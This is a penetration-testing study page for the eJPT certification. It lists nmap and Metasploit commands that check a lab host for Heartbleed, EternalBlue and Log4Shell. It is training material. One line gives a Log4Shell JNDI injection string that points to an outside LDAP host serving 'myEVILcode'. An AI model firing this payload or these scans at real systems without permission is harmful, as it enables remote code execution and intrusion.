Vulnerability Assessment | eJPT

Conducting a thorough vulnerability assessment is a key component of the eLearnSecurity Junior Penetration Tester (eJPT) certification. This process involves identifying and evaluating potential vulnerabilities within a system. Here are commands to assess specific CVEs, showcasing the use of nmap scripts for targeted vulnerability discovery.

 

CVE-2014-0160

Explore SSL vulnerabilities with nmap scripts:

SSL Enumeration Ciphers

nmap 10.10.10.10 -sV -p 443 --script ssl-enum-ciphers

 

Heartbleed (CVE-2014-0160 )

nmap 10.10.10.10 -p 443 --script ssl-heartbleed

 

CVE-2017-0143 (EternalBlue)

Assess SMB vulnerabilities using nmap and Metasploit:

SMB Vulnerability Check

nmap 10.10.10.10 -p 445 --script smb-vuln-ms17-010

 

Metasploit Module

msf5> auxiliary/scanner/smb/smb_ms_17_010

 

CVE-2021-44228 (Log4J)

Discover potential Log4J vulnerabilities with nmap:

Log4Shell Discovery

nmap 10.10.10.10 -p 8080 --script log4shell.nse --script-args log4shell.callback-server=127.1.2.32:4435

The input field requires the following format

[field]> ${jndi:ldap<!--delete comment-->:://demo.domain.com:1389/myEVILcode}

Explore these commands to perform a vulnerability assessment, an essential skill for eLearnSecurity Junior Penetration Tester (eJPT) certification.

 

Check out: Servers & Services Enumeration | eJPT

 

Leave a comment

Your email address will not be published. Required fields are marked *